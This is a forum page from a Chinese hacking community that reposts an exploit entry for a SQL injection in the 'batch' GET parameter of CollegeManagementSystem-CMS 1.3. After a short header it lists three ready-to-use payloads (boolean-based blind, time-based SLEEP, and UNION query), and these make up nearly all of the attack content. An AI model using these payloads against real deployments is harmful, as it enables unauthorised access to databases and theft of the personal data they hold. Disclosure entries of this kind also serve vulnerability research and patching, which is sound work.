游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection

PHP,webapps,

发布于2022年11月4日2年前

# Exploit Title: CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-16
# Vendor Homepage: https://github.com/SaloniKumari123/CollegeManagementSystem
# Software Link: https://github.com/SaloniKumari123/CollegeManagementSystem/archive/master.zip
# Tested Version: 1.3
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Another College Management system coded in PHP, most input values accounted for and sanitized, except this one :-)

# Parameter: batch (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause

Payload: batch=-9643' OR 9247=9247-- aqgq

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: batch=2021' AND (SELECT 6451 FROM (SELECT(SLEEP(5)))CWMt)-- zEfe

# Type: UNION query
# Title: Generic UNION query (NULL) - 3 columns

Payload: batch=2021' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x564f6e51546c6f634741454d714e5777716d427361504d7a794b686c50657472724d616f49674b51,0x7171627171),NULL-- pPUb